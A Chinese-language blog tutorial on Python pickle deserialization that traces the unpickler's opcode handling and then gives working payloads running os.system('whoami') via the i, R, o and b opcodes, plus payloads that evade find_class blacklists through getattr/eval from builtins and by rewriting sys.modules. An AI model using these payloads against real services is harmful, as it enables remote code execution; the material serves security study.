
 <!DOCTYPE HTML>
<html lang="en">
<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  
    <title>Pickle反序列化 | buxqm</title>
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=3, minimum-scale=1">
    
    <meta name="author" content="Ycj">
    
    <meta name="description" content="Pickle反序列化的分析与利用反序列化过程分析pickle.dump()方法可以将对象序列化。
12345678import pickleclass animal:    def __init__(self,animal):        self.animal=animal        tes">
    
    
    
    
    
    <link rel="icon" href="/img/favicon.ico">
    
    
    <link rel="apple-touch-icon" href="/img/author.jpg">
    <link rel="apple-touch-icon-precomposed" href="/img/author.jpg">
    
    <link rel="stylesheet" href="/css/style.css">
</head>
</html>
  <body>
    <header>
      <div>
		
			<div id="imglogo">
				<a href="/"><img src="/img/logo.svg" alt="buxqm" title="buxqm"/></a>
			</div>
			
			<div id="textlogo">
				<h1 class="site-name"><a href="/" title="buxqm">buxqm</a></h1>
				<h2 class="blog-motto"></h2>
			</div>
			<div class="navbar"><a class="navbutton navmobile" href="#" title="Menu">
			</a></div>
			<nav class="animated">
				<ul>
					
						<li><a href="/">Home</a></li>
					
						<li><a href="/archives">Archives</a></li>
					
					<li>
					
					<form class="search" action="//google.com/search" method="get" accept-charset="utf-8">
						<label>Search</label>
						<input type="text" id="search" name="q" autocomplete="off" maxlength="20" placeholder="Search" />
						<input type="hidden" name="q" value="site:yoursite.com">
					</form>
					
					</li>
				</ul>
			</nav>			
</div>

    </header>
    <div id="container">
      <div id="main" class="post" itemscope itemprop="blogPost">
	<article itemprop="articleBody"> 
		<header class="article-info clearfix">
  <h1 itemprop="name">
    
      <a href="/2020/09/21/Pickle反序列化/" title="Pickle反序列化" itemprop="url">Pickle反序列化</a>
  </h1>
  <p class="article-author">By
    
      <a href="http://yoursite.com" title="Ycj">Ycj</a>
    </p>
  <p class="article-time">
    <time datetime="2020-09-20T16:00:00.000Z" itemprop="datePublished">2020-09-21</time>
    Updated:<time datetime="2020-09-28T08:34:57.094Z" itemprop="dateModified">2020-09-28</time>
    
  </p>
</header>
	<div class="article-content">
		
		
		<div id="toc" class="toc-article">
			<strong class="toc-title">Contents</strong>
		<ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pickle反序列化的分析与利用"><span class="toc-number">1.</span> <span class="toc-text">Pickle反序列化的分析与利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#反序列化过程分析"><span class="toc-number">1.1.</span> <span class="toc-text">反序列化过程分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反序列化漏洞利用"><span class="toc-number">1.2.</span> <span class="toc-text">反序列化漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#全局变量引入"><span class="toc-number">1.2.1.</span> <span class="toc-text">全局变量引入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#全局变量修改"><span class="toc-number">1.2.2.</span> <span class="toc-text">全局变量修改</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#函数执行"><span class="toc-number">1.2.3.</span> <span class="toc-text">函数执行</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#i操作码"><span class="toc-number">1.2.3.1.</span> <span class="toc-text">i操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#R操作码"><span class="toc-number">1.2.3.2.</span> <span class="toc-text">R操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#o操作码"><span class="toc-number">1.2.3.3.</span> <span class="toc-text">o操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b操作码"><span class="toc-number">1.2.3.4.</span> <span class="toc-text">b操作码</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF绕过"><span class="toc-number">1.2.4.</span> <span class="toc-text">WAF绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#黑名单绕过"><span class="toc-number">1.2.4.1.</span> <span class="toc-text">黑名单绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#构造getattr函数"><span class="toc-number">1.2.4.1.1.</span> <span class="toc-text">构造getattr函数</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#绕过域名空间限制"><span class="toc-number">1.2.4.2.</span> <span class="toc-text">绕过域名空间限制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#重写sys-modules"><span class="toc-number">1.2.4.2.1.</span> <span class="toc-text">重写sys.modules</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考文章"><span class="toc-number">2.</span> <span class="toc-text">参考文章</span></a></li></ol>
		</div>
		
		<h1 id="Pickle反序列化的分析与利用"><a href="#Pickle反序列化的分析与利用" class="headerlink" title="Pickle反序列化的分析与利用"></a>Pickle反序列化的分析与利用</h1><h2 id="反序列化过程分析"><a href="#反序列化过程分析" class="headerlink" title="反序列化过程分析"></a>反序列化过程分析</h2><p>pickle.dump()方法可以将对象序列化。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">import pickle</span><br><span class="line"></span><br><span class="line">class animal:</span><br><span class="line">    def __init__(self,animal):</span><br><span class="line">        self.animal=animal</span><br><span class="line">        </span><br><span class="line">test=pickle.dumps(animal(&quot;dog&quot;))</span><br><span class="line">print(test)</span><br></pre></td></tr></table></figure>

<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">b&apos;\x80\x03c__main__\nanimal\nq\x00)\x81q\x01&#125;q\x02X\x06\x00\x00\x00animalq\x03X\x03\x00\x00\x00dogq\x04sb.&apos;</span><br></pre></td></tr></table></figure>

<p>使用pickle.loads()方法反序列化字符串，查看一下loads方法的源码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">_loads</span><span class="params">(s, *, fix_imports=True, encoding=<span class="string">"ASCII"</span>, errors=<span class="string">"strict"</span>)</span>:</span></span><br><span class="line">    <span class="keyword">if</span> isinstance(s, str):</span><br><span class="line">        <span class="keyword">raise</span> TypeError(<span class="string">"Can't load pickle from unicode string"</span>)</span><br><span class="line">    file = io.BytesIO(s)</span><br><span class="line">    <span class="keyword">return</span> _Unpickler(file, fix_imports=fix_imports,</span><br><span class="line">                      encoding=encoding, errors=errors).load()</span><br></pre></td></tr></table></figure>

<p>跟进_Unpickler类的load方法,重点在下面这一段代码：</p>
<p>在dispatch字典中以<code>opcode=&gt;function</code>的行式存放了许多方法，程序从序列化字符串中读取数据(opcode)，程序通过opcode索引执行对应的方法.。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">try</span>:</span><br><span class="line">    <span class="keyword">while</span> <span class="literal">True</span>:</span><br><span class="line">        key = read(<span class="number">1</span>)</span><br><span class="line">        <span class="keyword">if</span> <span class="keyword">not</span> key:</span><br><span class="line">            <span class="keyword">raise</span> EOFError</span><br><span class="line">        <span class="keyword">assert</span> isinstance(key, bytes_types)</span><br><span class="line">        dispatch[key[<span class="number">0</span>]](self)</span><br><span class="line"><span class="keyword">except</span> _Stop <span class="keyword">as</span> stopinst:</span><br><span class="line">    <span class="keyword">return</span> stopinst.value</span><br></pre></td></tr></table></figure>

<p>拿上面的序列化字符串当作例子,逐步分析整个序列化过程。</p>
<p>第一步：读取到<code>\x80</code>，通过dispatch字典索引，调用load_proto方法（接下来不再将函数贴出来，推荐自己配合源码阅读）</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">load_proto</span><span class="params">(self)</span>:</span></span><br><span class="line">	proto = self.read(<span class="number">1</span>)[<span class="number">0</span>]</span><br><span class="line">	<span class="keyword">if</span> <span class="keyword">not</span> <span class="number">0</span> &lt;= proto &lt;= HIGHEST_PROTOCOL:</span><br><span class="line">		<span class="keyword">raise</span> ValueError(<span class="string">"unsupported pickle protocol: %d"</span> % proto)</span><br><span class="line">	self.proto = proto</span><br></pre></td></tr></table></figure>

<p>程序继续读取一个字节，读取到<code>\x03</code>，它的意思是：这是一个根据三号协议序列化的字符串。</p>
<p>第二部：读取到<code>c</code> (GLOBAL操作码) ，程序往前读取两行字符串，获取域名空间与类名<code>module=__main__,name=animal</code>，调用find_class函数获取到animal对象，并压入栈stack中。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;<span class="class"><span class="keyword">class</span> '<span class="title">__main__</span>.<span class="title">animal</span>'&gt;]</span></span><br></pre></td></tr></table></figure>

<p>第三步：读取到<code>q</code>（binput操作码），继续读取下一个字节为0，对应的操作为：将stack中栈尾的数据保存到memo字典中的0号位置(可以理解为逐步保存stack中的数据，方便之后调用)。</p>
<p>第四步：读取到<code>)</code>（EMPTY_TUPLE操作码），往栈中压入空的元组。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;class '__main__.animal'&gt;,()]</span><br></pre></td></tr></table></figure>

<p>第五步：读取到<code>\x81</code>（NEW_OBJ），弹出<code>()</code>赋值给args，然后再弹出<code>&lt;class &#39;__main__.animal&#39;&gt;</code>赋值给cls，在这里是animal对象，之后用<code>cls.__new__(cls,*args)</code>实例化该对象并压入栈中，在这里args为空，所以栈中任然是一个空的animal对象。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;<span class="class"><span class="keyword">class</span> '<span class="title">__main__</span>.<span class="title">animal</span>'&gt;]</span></span><br></pre></td></tr></table></figure>

<p>第六步：读取到<code>q\x01</code>将上面实例化的对象保存到memo[1]中。</p>
<p>第七步：读取到<code>}</code>，往栈中压入空的字典。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;class &apos;__main__.animal&apos;&gt;,&#123;&#125;]</span><br></pre></td></tr></table></figure>

<p>第八步：读取到<code>q\x02</code>将该字典存到memo[2]中。</p>
<p>第九步：读取到<code>X</code>继续向前读取四个字节代表字符串长度，<code>\x06\x00\x00\x00</code>获得字符串长度为6，接着继续往后读取六个字符<code>animal</code>，存入栈中。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;class '__main__.animal'&gt;,&#123;&#125;,animal]</span><br></pre></td></tr></table></figure>

<p>第九步：读取到<code>q\x03</code>将上面的字符串保存到memo[3]中。</p>
<p>第十步：继续向前提取出<code>dog</code>并保存到memo[4]中。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;class &apos;__main__.animal&apos;&gt;,&#123;&#125;,animal,dog]</span><br></pre></td></tr></table></figure>

<p>第十一步：读取到<code>s</code>(SETITEM操作符)，弹出数据作为值，再弹出数据作为健，最后弹出一个数据 (一定要是字典类型) ，以键值对的形式将数据存入该字典中，{‘animal’:’dog’}`,并入栈。</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;class '__main__.animal'&gt;,&#123;'animal':'dog'&#125;]</span><br></pre></td></tr></table></figure>

<p>第十二步：读取到<code>b</code>(BUILD操作符)，从栈中弹出字典类型的数据赋值给state，弹出<code>&lt;class &#39;__main__.animal&#39;&gt;</code>赋值给inst,如果inst中存在<code>__setstate__</code>方法，则直接用setstate来处理state<code>setstate(state)</code>，如果不存在，则直接将state存入<code>inst.__dict__</code>中。</p>
<p>第十三步：读取到<code>.</code>，结束反序列化。</p>
<h2 id="反序列化漏洞利用"><a href="#反序列化漏洞利用" class="headerlink" title="反序列化漏洞利用"></a>反序列化漏洞利用</h2><p>从上面的反序列化过程我们可以看出，python的反序列化过程是完全可控的，接下来介绍几种常用的利用技巧。</p>
<h3 id="全局变量引入"><a href="#全局变量引入" class="headerlink" title="全局变量引入"></a>全局变量引入</h3><p>在碰到<code>s</code>操作码时，会弹出两个字符串作为键值对保存到字典中，我们可以通过<code>c</code>操作码来得到secret.best，再使<code>animal=secret.best</code>，这样就成功引入了全局变量。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> pickle</span><br><span class="line"><span class="keyword">import</span> secret</span><br><span class="line"><span class="class"><span class="keyword">class</span> <span class="title">animal</span>:</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">__init__</span><span class="params">(self)</span>:</span></span><br><span class="line">        self.animal=<span class="string">"dog"</span></span><br><span class="line">    <span class="function"><span class="keyword">def</span> <span class="title">check</span><span class="params">(self)</span>:</span></span><br><span class="line">        <span class="keyword">if</span> self.animal==secret.best:</span><br><span class="line">            print(<span class="string">"good!"</span>)</span><br><span class="line"></span><br><span class="line">code=<span class="string">"your code"</span></span><br><span class="line">pickle.loads(code)</span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'\x80\x03c__main__\nanimal\nq\x00)\x81q\x01&#125;q\x02X\x06\x00\x00\x00animalq\x03csecret\nbest\nq\x04sb.'</span></span><br></pre></td></tr></table></figure>

<h3 id="全局变量修改"><a href="#全局变量修改" class="headerlink" title="全局变量修改"></a>全局变量修改</h3><p><code>c</code>操作符是通过调用find_class方法来获取对象，而find_class使用<code>sys.modules[module],name)</code>来获取到相应的属性，sys.modules是一个全局字典，该字典是python启动后就加载在内存中。每导入新的模块，sys.modules会将该模块导入字典中。</p>
<p>在上述代码中，导入了secret模块，所以我们可以通过<code>c</code>操作符获取到secret模块并对secret.best进行重构，再基于此构造animal类。 </p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'\x80\x03c__main__\nsecret\nq\x00q\x01&#125;X\x04\x00\x00\x00bestX\x03\x00\x00\x00dogsb0c__main__\nanimal\n)\x81&#125;X\x06\x00\x00\x00animalX\x03\x00\x00\x00dogsb.'</span></span><br></pre></td></tr></table></figure>

<h3 id="函数执行"><a href="#函数执行" class="headerlink" title="函数执行"></a>函数执行</h3><p>与函数执行有关的操作码有<code>r,i,o,b</code></p>
<h4 id="i操作码"><a href="#i操作码" class="headerlink" title="i操作码"></a><code>i</code>操作码</h4><p><code>i</code>操作码的代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">load_inst</span><span class="params">(self)</span>:</span></span><br><span class="line">    module = self.readline()[:<span class="number">-1</span>].decode(<span class="string">"ascii"</span>)</span><br><span class="line">    name = self.readline()[:<span class="number">-1</span>].decode(<span class="string">"ascii"</span>)</span><br><span class="line">    klass = self.find_class(module, name)</span><br><span class="line">    self._instantiate(klass, self.pop_mark())</span><br><span class="line">dispatch[INST[<span class="number">0</span>]] = load_inst</span><br></pre></td></tr></table></figure>

<p>首先通过find_class获得方法，然后通过pop_mark获得参数，并调用_instantiate函数来执行，并将执行的结果存入栈中。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">pop_mark</span><span class="params">(self)</span>:</span></span><br><span class="line">    items = self.stack</span><br><span class="line">    self.stack = self.metastack.pop()</span><br><span class="line">    self.append = self.stack.append</span><br><span class="line">    <span class="keyword">return</span> items</span><br></pre></td></tr></table></figure>

<p>相关操作是获取当前栈上的内容，然后将弹出前序栈重新赋值给当前栈，然后返回item作为参数。</p>
<p>所以我们首先用<code>(</code>操作符将当前栈stack中的内容存到前序栈中，通过<code>i</code>操作符获取到<code>os.system</code>并执行whoami指令。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'(X\x06\x00\x00\x00whoamiios\nsystem\n.'</span></span><br></pre></td></tr></table></figure>

<p>成功执行os.system(‘whoami’)。</p>
<h4 id="R操作码"><a href="#R操作码" class="headerlink" title="R操作码"></a><code>R</code>操作码</h4><p>R操作码的代码如下。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">load_reduce</span><span class="params">(self)</span>:</span></span><br><span class="line">    stack = self.stack</span><br><span class="line">    args = stack.pop()</span><br><span class="line">    func = stack[<span class="number">-1</span>]</span><br><span class="line">    stack[<span class="number">-1</span>] = func(*args)</span><br><span class="line">dispatch[REDUCE[<span class="number">0</span>]] = load_reduce</span><br></pre></td></tr></table></figure>

<p>分析一下，弹栈作为参数(必须是元组)，将栈中最后一个数据作为函数，并用执行结果将函数覆盖。</p>
<p>所以可以这么构造<code>cos\nsystem\nX\x06\x00\x00\x00whoami\x85R</code>，<code>\x85</code>的作用是 将栈中最后一个数据变成元组重新入栈。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">stack:[&lt;built-<span class="keyword">in</span> function system&gt;,(whoami)]</span><br></pre></td></tr></table></figure>

<p>成功执行os.system(‘whoami’)。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'cos\nsystem\nX\x06\x00\x00\x00whoami\x85R.'</span></span><br></pre></td></tr></table></figure>

<h4 id="o操作码"><a href="#o操作码" class="headerlink" title="o操作码"></a><code>o</code>操作码</h4><p>o操作码的代码如下：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">load_obj</span><span class="params">(self)</span>:</span></span><br><span class="line">    <span class="comment"># Stack is ... markobject classobject arg1 arg2 ...</span></span><br><span class="line">    args = self.pop_mark()</span><br><span class="line">    cls = args.pop(<span class="number">0</span>)</span><br><span class="line">    self._instantiate(cls, args)</span><br><span class="line">dispatch[OBJ[<span class="number">0</span>]] = load_obj</span><br></pre></td></tr></table></figure>

<p>o操作码将函数与参数弹栈后，直接交给_instantiate执行，并将执行结果存入栈中。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'(cos\nsystem\nX\x06\x00\x00\x00whoamio.'</span></span><br></pre></td></tr></table></figure>

<h4 id="b操作码"><a href="#b操作码" class="headerlink" title="b操作码"></a><code>b</code>操作码</h4><p>在b操作码执行过程中，如果碰到自定义的<code>__setstate__</code>，就会执行以下代码。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">setstate = getattr(inst, <span class="string">"__setstate__"</span>, <span class="literal">None</span>)</span><br><span class="line"><span class="keyword">if</span> setstate <span class="keyword">is</span> <span class="keyword">not</span> <span class="literal">None</span>:</span><br><span class="line">    setstate(state)</span><br><span class="line">    <span class="keyword">return</span></span><br></pre></td></tr></table></figure>

<p>如果存在<code>__setstate__</code>方法,就直接执行setstate方法，所以可以通过构造<code>__setstate__</code>来进行任意函数执行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload=<span class="string">b'\x80\x03c__main__\nanimal\n)\x81&#125;X\x0C\x00\x00\x00__setstate__cos\nsystem\nsbX\x06\x00\x00\x00whoamib.'</span></span><br></pre></td></tr></table></figure>

<p>首先利用<code>{&#39;__setstate__&#39;: os.system}</code>来BUILE一次animal对象，然后用<code>whoami</code>再次进行构造，由于存在<code>__setstate__</code>方法，此时state为<code>whoami</code>，所以成功执行os.system(‘whoami’)。</p>
<h3 id="WAF绕过"><a href="#WAF绕过" class="headerlink" title="WAF绕过"></a>WAF绕过</h3><p>目前主要的漏洞利用都是通过find_class引入os.system等函数函数，所以可以通过重写fine_class添加黑名单等限制，来保护自己的程序。</p>
<h4 id="黑名单绕过"><a href="#黑名单绕过" class="headerlink" title="黑名单绕过"></a>黑名单绕过</h4><h5 id="构造getattr函数"><a href="#构造getattr函数" class="headerlink" title="构造getattr函数"></a>构造getattr函数</h5><p>可以使用builtins模块构造getattr函数，不再经过find_class，就能绕过WAF实现任意函数执行。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">R操作码</span><br><span class="line">payload=<span class="string">b'\x80\x03cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00get\x86Rp2\n0g2\ncbuiltins\nglobals\n)RX\x0C\x00\x00\x00__builtins__\x86Rp3\n0g0\ng3\nX\x04\x00\x00\x00eval\x86Rp4\n0g4\nX\x21\x00\x00\x00__import__("os").system("whoami")\x85R.'</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">o操作码：payload=<span class="string">b'\x80\x03(cbuiltins\ngetattr\np0\ncbuiltins\ndict\np1\nX\x03\x00\x00\x00getop2\n0(g2\n(cbuiltins\nglobals\noX\x0C\x00\x00\x00__builtins__op3\n(g0\ng3\nX\x04\x00\x00\x00evalop4\n(g4\nX\x21\x00\x00\x00__import__("os").system("whoami")o.'</span></span><br></pre></td></tr></table></figure>

<p>通过builtins模块构造getattr，获得dict类的get方法，使用get方法取得<code>__builtins__</code>字典中的eval函数，然后使用<code>__import__</code>函数的导入os，成功执行os.system(“whoami”)。</p>
<h4 id="绕过域名空间限制"><a href="#绕过域名空间限制" class="headerlink" title="绕过域名空间限制"></a>绕过域名空间限制</h4><h5 id="重写sys-modules"><a href="#重写sys-modules" class="headerlink" title="重写sys.modules"></a>重写sys.modules</h5><p>之前说过find_class使用<code>sys.modules[module],name)</code>来引入模块，但是sys自身也在sys.modules中，所以通过s操作符使sys.modules[‘sys’]=sys.modules，sys模块也就变成了sys.modules模块，然后引入sys.modules中的get方法，取得sys.modules字典中的os模块，再使用s操作符使sys.modules[‘sys’]=os，当前sys模块就变成了os模块，最后成功执行os.system(“whoami”)。</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">R操作码</span><br><span class="line">payload=<span class="string">b'csys\nmodules\np0\nX\x03\x00\x00\x00sysg0\nscsys\nget\np1\ng1\nX\x02\x00\x00\x00os\x85Rp2\ng0\nX\x03\x00\x00\x00sysg2\nscsys\nsystem\nX\x06\x00\x00\x00whoami\x85R.'</span></span><br></pre></td></tr></table></figure>

<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">o操作码</span><br><span class="line">payload=<span class="string">b'csys\nmodules\np0\nX\x03\x00\x00\x00sysg0\ns(csys\nget\np1\nX\x02\x00\x00\x00osop2\ng0\nX\x03\x00\x00\x00sysg2\ns(csys\nsystem\nX\x06\x00\x00\x00whoamio.'</span></span><br></pre></td></tr></table></figure>

<h1 id="参考文章"><a href="#参考文章" class="headerlink" title="参考文章"></a>参考文章</h1><ul>
<li><a href="https://xz.aliyun.com/t/7436#toc-11" target="_blank" rel="noopener">https://xz.aliyun.com/t/7436#toc-11</a></li>
<li><a href="https://zhuanlan.zhihu.com/p/89132768" target="_blank" rel="noopener">https://zhuanlan.zhihu.com/p/89132768</a> </li>
</ul>
  
	</div>
		<footer class="article-footer clearfix">


<div class="article-categories">
  <span></span>
  <a class="article-category-link" href="/categories/python/">python</a>
</div>



<div class="article-share" id="share">

  <div data-url="http://yoursite.com/2020/09/21/Pickle反序列化/" data-title="Pickle反序列化 | buxqm" data-tsina="" class="share clearfix">
  </div>

</div>
</footer>   	       
	</article>
	
<nav class="article-nav clearfix">
 
 <div class="prev" >
 <a href="/2020/09/27/极客巅峰/" title="极客巅峰+月饼赛">
  <strong>PREVIOUS:</strong><br/>
  <span>
  极客巅峰+月饼赛</span>
</a>
</div>


<div class="next">
<a href="/2020/08/11/垃圾分类系统开发/"  title="垃圾分类系统开发">
 <strong>NEXT:</strong><br/> 
 <span>垃圾分类系统开发
</span>
</a>
</div>

</nav>

	
<section class="comment">
	<div class="ds-thread"></div>
</section>

</div>  
      <div class="openaside"><a class="navbutton" href="#" title="Show Sidebar"></a></div>

  <div id="toc" class="toc-aside">
  <strong class="toc-title">Contents</strong>
  <ol class="toc"><li class="toc-item toc-level-1"><a class="toc-link" href="#Pickle反序列化的分析与利用"><span class="toc-number">1.</span> <span class="toc-text">Pickle反序列化的分析与利用</span></a><ol class="toc-child"><li class="toc-item toc-level-2"><a class="toc-link" href="#反序列化过程分析"><span class="toc-number">1.1.</span> <span class="toc-text">反序列化过程分析</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#反序列化漏洞利用"><span class="toc-number">1.2.</span> <span class="toc-text">反序列化漏洞利用</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#全局变量引入"><span class="toc-number">1.2.1.</span> <span class="toc-text">全局变量引入</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#全局变量修改"><span class="toc-number">1.2.2.</span> <span class="toc-text">全局变量修改</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#函数执行"><span class="toc-number">1.2.3.</span> <span class="toc-text">函数执行</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#i操作码"><span class="toc-number">1.2.3.1.</span> <span class="toc-text">i操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#R操作码"><span class="toc-number">1.2.3.2.</span> <span class="toc-text">R操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#o操作码"><span class="toc-number">1.2.3.3.</span> <span class="toc-text">o操作码</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#b操作码"><span class="toc-number">1.2.3.4.</span> <span class="toc-text">b操作码</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#WAF绕过"><span class="toc-number">1.2.4.</span> <span class="toc-text">WAF绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#黑名单绕过"><span class="toc-number">1.2.4.1.</span> <span class="toc-text">黑名单绕过</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#构造getattr函数"><span class="toc-number">1.2.4.1.1.</span> <span class="toc-text">构造getattr函数</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#绕过域名空间限制"><span class="toc-number">1.2.4.2.</span> <span class="toc-text">绕过域名空间限制</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#重写sys-modules"><span class="toc-number">1.2.4.2.1.</span> <span class="toc-text">重写sys.modules</span></a></li></ol></li></ol></li></ol></li></ol></li><li class="toc-item toc-level-1"><a class="toc-link" href="#参考文章"><span class="toc-number">2.</span> <span class="toc-text">参考文章</span></a></li></ol>
  </div>

<div id="asidepart">
<div class="closeaside"><a class="closebutton" href="#" title="Hide Sidebar"></a></div>
<aside class="clearfix">

  
<div class="categorieslist">
	<p class="asidetitle">Categories</p>
		<ul>
		
			<li><a href="/categories/WebBook/" title="WebBook">WebBook<sup>0</sup></a></li>
		
			<li><a href="/categories/XXE/" title="XXE">XXE<sup>1</sup></a></li>
		
			<li><a href="/categories/docker/" title="docker">docker<sup>1</sup></a></li>
		
			<li><a href="/categories/python/" title="python">python<sup>1</sup></a></li>
		
			<li><a href="/categories/sql注入/" title="sql注入">sql注入<sup>0</sup></a></li>
		
			<li><a href="/categories/writeup/" title="writeup">writeup<sup>1</sup></a></li>
		
			<li><a href="/categories/xss学习/" title="xss学习">xss学习<sup>0</sup></a></li>
		
			<li><a href="/categories/专题-JavaWeb/" title="专题  JavaWeb">专题  JavaWeb<sup>0</sup></a></li>
		
